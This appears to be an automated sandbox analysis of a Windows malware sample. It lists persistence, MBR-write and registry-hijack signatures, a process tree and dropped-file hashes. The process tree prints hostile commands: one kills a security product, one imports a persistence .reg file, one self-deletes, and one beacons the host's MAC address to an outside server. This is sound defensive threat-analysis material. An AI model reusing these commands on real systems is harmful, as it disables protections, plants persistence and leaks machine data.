Analysis
-
max time kernel
42s -
max time network
46s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
19/09/2022, 11:21
Static task
static1
Behavioral task
behavioral1
Sample
d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe
Resource
win10v2004-20220812-en
General
-
Target
d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe
-
Size
208KB
-
MD5
1690e0408b941cfe9f8d8ffe46bb9481
-
SHA1
03d3a9c8e5bff263caa06c4795bd4dca2d1561c7
-
SHA256
d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190
-
SHA512
02a272ca995f123df7becf79b4b3a17b11f5fbcfbcac070c001d20b79a07035cdc99b10a72554728591b6370e3eedb58649dc4fff102322fc2fa06ecb67d6bc6
-
SSDEEP
6144:jZA/L880NEJji+5rqqULirD2Ei/NjO50p8I4cC:je/L880NEJjBdrm/fGI4D
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\SysWOW64\\4875\\gwwhrod7.exe" regedit.exe -
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" y5dbadrm.exe -
Executes dropped EXE 2 IoCs
pid Process 1032 takesoft.exe 1036 y5dbadrm.exe -
Deletes itself 1 IoCs
pid Process 1032 takesoft.exe -
Loads dropped DLL 4 IoCs
pid Process 1852 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe 1852 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe 1032 takesoft.exe 1032 takesoft.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe -
Drops file in System32 directory 16 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\4875\takesoft.exe d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe File opened for modification C:\Windows\SysWOW64\4875\2.ico d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe File created C:\Windows\SysWOW64\4875\test.reg takesoft.exe File opened for modification C:\Windows\SysWOW64\4875\3.ico d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe File opened for modification C:\Windows\SysWOW64\4875\5.ico d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe File opened for modification C:\Windows\SysWOW64\4875\takesoft.exe takesoft.exe File opened for modification C:\Windows\SysWOW64\4875\4.ico d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe File opened for modification C:\Windows\SysWOW64\4875\7.ico d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe File opened for modification C:\Windows\SysWOW64\4875\9.ico d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe File opened for modification C:\Windows\SysWOW64\4875\y5dbadrm.exe takesoft.exe File opened for modification C:\Windows\SysWOW64\4875\y5dbadrm.exe y5dbadrm.exe File opened for modification C:\Windows\SysWOW64\4875\6.ico d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe File opened for modification C:\Windows\SysWOW64\4875\8.ico d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe File opened for modification C:\Windows\SysWOW64\4875\10.ico d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe File opened for modification C:\Windows\SysWOW64\4875\dasoft.encode d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe File opened for modification C:\Windows\SysWOW64\4875\dasoft.encode takesoft.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 2 IoCs
pid Process 884 taskkill.exe 960 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A00C3811-384D-11ED-A34F-EA25B6F29539} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.IE y5dbadrm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.IE\ = "IE" y5dbadrm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\IE y5dbadrm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\IE\ = "????" y5dbadrm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\IE\shell\open\command y5dbadrm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\IE\shell\open\command\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE http://www.6701.com/?G04" y5dbadrm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\IE\DefaultIcon y5dbadrm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\IE\shell y5dbadrm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\IE\shell\open y5dbadrm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\IE\DefaultIcon\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE,0" y5dbadrm.exe -
Runs .reg file with regedit 1 IoCs
pid Process 2000 regedit.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1224 PING.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1852 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe 1032 takesoft.exe 1036 y5dbadrm.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 884 taskkill.exe Token: SeDebugPrivilege 1032 takesoft.exe Token: SeDebugPrivilege 1036 y5dbadrm.exe Token: SeDebugPrivilege 960 taskkill.exe Token: SeDebugPrivilege 1036 y5dbadrm.exe Token: SeDebugPrivilege 1036 y5dbadrm.exe Token: SeDebugPrivilege 1036 y5dbadrm.exe Token: SeDebugPrivilege 1036 y5dbadrm.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1376 iexplore.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 1852 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe 1376 iexplore.exe 1376 iexplore.exe 1624 IEXPLORE.EXE 1624 IEXPLORE.EXE 1032 takesoft.exe 1036 y5dbadrm.exe -
Suspicious use of WriteProcessMemory 40 IoCs
description pid Process procid_target PID 1852 wrote to memory of 884 1852 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe 28 PID 1852 wrote to memory of 884 1852 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe 28 PID 1852 wrote to memory of 884 1852 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe 28 PID 1852 wrote to memory of 884 1852 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe 28 PID 1852 wrote to memory of 1376 1852 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe 31 PID 1852 wrote to memory of 1376 1852 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe 31 PID 1852 wrote to memory of 1376 1852 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe 31 PID 1852 wrote to memory of 1376 1852 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe 31 PID 1376 wrote to memory of 1624 1376 iexplore.exe 33 PID 1376 wrote to memory of 1624 1376 iexplore.exe 33 PID 1376 wrote to memory of 1624 1376 iexplore.exe 33 PID 1376 wrote to memory of 1624 1376 iexplore.exe 33 PID 1852 wrote to memory of 1032 1852 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe 35 PID 1852 wrote to memory of 1032 1852 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe 35 PID 1852 wrote to memory of 1032 1852 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe 35 PID 1852 wrote to memory of 1032 1852 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe 35 PID 1032 wrote to memory of 568 1032 takesoft.exe 36 PID 1032 wrote to memory of 568 1032 takesoft.exe 36 PID 1032 wrote to memory of 568 1032 takesoft.exe 36 PID 1032 wrote to memory of 568 1032 takesoft.exe 36 PID 1032 wrote to memory of 1036 1032 takesoft.exe 38 PID 1032 wrote to memory of 1036 1032 takesoft.exe 38 PID 1032 wrote to memory of 1036 1032 takesoft.exe 38 PID 1032 wrote to memory of 1036 1032 takesoft.exe 38 PID 1036 wrote to memory of 960 1036 y5dbadrm.exe 39 PID 1036 wrote to memory of 960 1036 y5dbadrm.exe 39 PID 1036 wrote to memory of 960 1036 y5dbadrm.exe 39 PID 1036 wrote to memory of 960 1036 y5dbadrm.exe 39 PID 568 wrote to memory of 2000 568 cmd.exe 40 PID 568 wrote to memory of 2000 568 cmd.exe 40 PID 568 wrote to memory of 2000 568 cmd.exe 40 PID 568 wrote to memory of 2000 568 cmd.exe 40 PID 1036 wrote to memory of 1608 1036 y5dbadrm.exe 42 PID 1036 wrote to memory of 1608 1036 y5dbadrm.exe 42 PID 1036 wrote to memory of 1608 1036 y5dbadrm.exe 42 PID 1036 wrote to memory of 1608 1036 y5dbadrm.exe 42 PID 1608 wrote to memory of 1224 1608 cmd.exe 45 PID 1608 wrote to memory of 1224 1608 cmd.exe 45 PID 1608 wrote to memory of 1224 1608 cmd.exe 45 PID 1608 wrote to memory of 1224 1608 cmd.exe 45
Processes
-
C:\Users\Admin\AppData\Local\Temp\d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe"C:\Users\Admin\AppData\Local\Temp\d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe"1⤵
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ZhuDongFangyu.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:884
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.baigezi.com/shenjingyuan/get.asp?mac=EA25B6F29539&makedate=QM00013&comput=Home&ver=28&userid=00012⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1376 CREDAT:275457 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1624
-
-
-
C:\Windows\SysWOW64\4875\takesoft.exeC:\Windows\system32\4875\takesoft.exe C:\Users\Admin\AppData\Local\Temp\d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe===2⤵
- Executes dropped EXE
- Deletes itself
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\SysWOW64\cmd.execmd.exe /c regedit /s "C:\Windows\SysWOW64\4875\test.reg"3⤵
- Suspicious use of WriteProcessMemory
PID:568 -
C:\Windows\SysWOW64\regedit.exeregedit /s "C:\Windows\SysWOW64\4875\test.reg"4⤵
- Modifies WinLogon for persistence
- Runs .reg file with regedit
PID:2000
-
-
-
C:\Windows\SysWOW64\4875\y5dbadrm.exeC:\Windows\SysWOW64\4875\y5dbadrm.exe3⤵
- Modifies visibility of file extensions in Explorer
- Executes dropped EXE
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ZhuDongFangyu.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:960
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 1 && del "C:\Windows\SysWOW64\4875\y5dbadrm.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 15⤵
- Runs ping.exe
PID:1224
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
21KB
MD5927a2d7ff0b6bd652ac90f728b629df9
SHA16f884a65fb289ebd0b254feb252c2975db4b5653
SHA256d5bfb5ac7bde7a330c29af498d7d20671fabd89df0ec45a412c0387a7cbb0b58
SHA5120990da10058167907f93204188ed0c9b48e4a6de72dc80f6589063ca6f7c74b10dcc8124e3b385c3b8c8eb9e1c0accf39df640037b2244ae4c8d7ca955345422
-
Filesize
12KB
MD5c8bfba56ddee001619ec54b4295ed327
SHA1c9f811a28521725616069e087e85347356a8af53
SHA2569af534965d92113928ebb06b749e958caa1fb5491790df0144b1e1b442e66904
SHA51204a9b3dd8ff18d4d18d17e701381109e774bd21fb25688d5cea0933417d4d1a677ce89f980582456793e319e03c1cedc8da8b9d32dbb158e1a37e076f14b72e6
-
Filesize
12KB
MD5c8bfba56ddee001619ec54b4295ed327
SHA1c9f811a28521725616069e087e85347356a8af53
SHA2569af534965d92113928ebb06b749e958caa1fb5491790df0144b1e1b442e66904
SHA51204a9b3dd8ff18d4d18d17e701381109e774bd21fb25688d5cea0933417d4d1a677ce89f980582456793e319e03c1cedc8da8b9d32dbb158e1a37e076f14b72e6
-
Filesize
206B
MD514e0a5d62a1f101d3ee4214a02879a66
SHA18115fa6b7cae60397447d6a114e3005b00cda6d2
SHA256998d6224662826d510768455fac989f116ef0ee6f05b4a32cde12705bae75a82
SHA51266a63bd71a842ae1b0cfee829d9dcf5477d07378c334e6a9fcc8010d5154713ed52beffbd66e408893de40b708bae73f50e378bb3ad385924286ca57c178d8fc
-
Filesize
21KB
MD50c91131774261d721eb9827939bb803f
SHA1516f6b6ef440fdbb1435ee3b70f110d71957be15
SHA256ad4f6988c3b0d7dcd8cb4f0314edab495d418055900c5a36ff93fcac7e3da974
SHA512dde5c7fc27fa022c988cb306c4d8c67748de81b559c7f613263fa81d8b569746a02167c05b84568dd21766e27693a0e6245f09726c056aa0c4cb597a46a22a96
-
Filesize
21KB
MD50c91131774261d721eb9827939bb803f
SHA1516f6b6ef440fdbb1435ee3b70f110d71957be15
SHA256ad4f6988c3b0d7dcd8cb4f0314edab495d418055900c5a36ff93fcac7e3da974
SHA512dde5c7fc27fa022c988cb306c4d8c67748de81b559c7f613263fa81d8b569746a02167c05b84568dd21766e27693a0e6245f09726c056aa0c4cb597a46a22a96
-
Filesize
12KB
MD5c8bfba56ddee001619ec54b4295ed327
SHA1c9f811a28521725616069e087e85347356a8af53
SHA2569af534965d92113928ebb06b749e958caa1fb5491790df0144b1e1b442e66904
SHA51204a9b3dd8ff18d4d18d17e701381109e774bd21fb25688d5cea0933417d4d1a677ce89f980582456793e319e03c1cedc8da8b9d32dbb158e1a37e076f14b72e6
-
Filesize
12KB
MD5c8bfba56ddee001619ec54b4295ed327
SHA1c9f811a28521725616069e087e85347356a8af53
SHA2569af534965d92113928ebb06b749e958caa1fb5491790df0144b1e1b442e66904
SHA51204a9b3dd8ff18d4d18d17e701381109e774bd21fb25688d5cea0933417d4d1a677ce89f980582456793e319e03c1cedc8da8b9d32dbb158e1a37e076f14b72e6
-
Filesize
21KB
MD50c91131774261d721eb9827939bb803f
SHA1516f6b6ef440fdbb1435ee3b70f110d71957be15
SHA256ad4f6988c3b0d7dcd8cb4f0314edab495d418055900c5a36ff93fcac7e3da974
SHA512dde5c7fc27fa022c988cb306c4d8c67748de81b559c7f613263fa81d8b569746a02167c05b84568dd21766e27693a0e6245f09726c056aa0c4cb597a46a22a96
-
Filesize
21KB
MD50c91131774261d721eb9827939bb803f
SHA1516f6b6ef440fdbb1435ee3b70f110d71957be15
SHA256ad4f6988c3b0d7dcd8cb4f0314edab495d418055900c5a36ff93fcac7e3da974
SHA512dde5c7fc27fa022c988cb306c4d8c67748de81b559c7f613263fa81d8b569746a02167c05b84568dd21766e27693a0e6245f09726c056aa0c4cb597a46a22a96